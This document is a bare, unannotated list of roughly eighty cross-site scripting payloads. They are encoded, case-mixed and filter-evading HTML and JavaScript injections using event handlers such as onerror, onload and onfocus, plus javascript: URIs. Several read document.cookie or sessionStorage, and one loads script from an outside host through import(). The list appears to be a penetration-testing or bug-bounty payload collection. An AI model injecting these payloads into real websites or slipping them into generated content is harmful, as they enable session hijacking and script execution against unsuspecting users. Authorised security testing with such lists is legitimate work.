1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
1%27/confirm?.(1)/%27
1"*%2Fconf%0Cirm%0B(1)<%0C%2FScript%2F--%0C><%0CScript>%2F*
1"*/conf
1'/confirm?.(1)/'"
1\/confirm?.(1)/\
#'%22/onmouseover=alert(document.domain)//
<%2Fstyle><%2Fscript><​script>alert%28"XSS"%29<%2Fscript>
&#34;&gt;&lt;track/onerror​=&#x27;confirm\`1\`&#x27;&gt;
--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(document.domain)%3C/scRipt%3E
%5Cx6A%5Cx61%5Cx76%5Cx61%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx3aalert%281%29
%61lert();
<%73vg onlo%61d=%61lert('xss0r')>
aaaa “;alert(1)/
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> 
<A HRef=//ibrahimxss.store AutoFocus %26%2362 OnFocus%0C=import(href)> 
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab; c&Tab; r&Tab;i&Tab;p&Tab;t: console.log(1337)">XSS</a>
alert()
"*alert(1)*"
“;alert(1)/
alert?.(1) 
'alert(1)'.replace(/.+/,eval)
alert(cookie)
alert##<script>prompt(1234)</script>
(A("onerror='alert`1`'testabcd))/
//?aspxerrorpath=<script>alert(1)</script>
callback=<script>alert()</script>%0aTESTž
cv.pdf<img src=nothing onerror=alert("xss0r")>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle​=&#x0000000000061;lert&#x000000028;origin&#x000029;> 
<DIV+STYLE="background-image: url(javascript:alert(1))">
document[cookie]
"><form+onformdata=window.confirm(document.cookie)><!--
ibro"*alert(1)*"
<iframe src="javascript:alert(document.domain)"></iframe>
<img+border=3+alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/*+*/oNcliCk=alert()+)//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=confirm('Hassan')//&gt;\x3e>
<IMG+DYNSRC="javascript:alert(1);">
IMG+LOWSRC="javascript:alert(1);">
"><img/src=%20only=1%20OnErRor=x=alert`XSS`><!--
<img src=asdf onerror=alert(JSON.stringify(sessionStorage))>
<img src/onerror=alert(1)>
#"><img src=/ onerror=alert(document.domain)>
<img src=x onerror=alert&#40document.domain&#41>
<img src=x onerror="alert(origin)">
<img//////src=x oNlY=1 oNerror=alert('xxs')//
<input onfocus​="alert('XSS Found!')" autofocus>
<isindex+type=image+src=1+onerror=alert(1)>
javascript%3A%2561lert%281%29 javascript%3A%7B+alert%600%60+%7D
javascript%3A%2F%2F%250Aalert%281%29 
#javascript:alert(2);
javascript:alert('XSS')
javascript​:parent[/al/.source+/ert/.source](document.domain)
logout.php?callback=<script>alert()</script>%0aTEST
/me/m%3C/script%3E%3Csvg/onload=prompt(document.domain)%3E
/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//
"onclick​=prompt(8)><svg/onload​=prompt(8)>" 
' oncontent\visibilityautostatechange='a=alert,(a?a:a)(origin)' x=\v+styl\u0065='content-visibility:auto
onmouseover=alert(document.domain)//
PHNjcmlwdD5hbGVydCgiZG9jdW1lbnQuZG9tYWluIik8L3NjcmlwdD4=
</scrip<​/script>t><img src=q onerror=prompt(document.cookie)>
/<script>alert(1234)</script>
<ScripT>alert(1234)</ScRipT>
#<script>alert(1)</script>
<!-- --!><script>alert(1)</script>
<​sCript>alert(document.domain)<​/sCript>
<script>eval('al'+'ert(1)');</script>
<script>prompt('Stored XSS by Supakiad S. (m3ez)',document.domain);</script>
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
sm"*alert(1)*"
//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
"><svg onload=alert(1)>
"><svg/onload​=prompt(document.cookie)>
teste"link rel="canonical" accesskey="X" onclick="alert(1)"
test@gmail.com%2527%5C%2522%253E%253Csvg%2Fonload%3Dalert%28%2Fxss%2F%29%253E
test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
"><track/onerror​='confirm1'>
<video src=">" onerror​=setTimeout`confirm\x281\x29`>
xss%27);}}});alert(document.cookie);$(function+a(){a();});$(function+a(){if(a){}else+if(a){/*///
嘼嘾img%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3B%3E
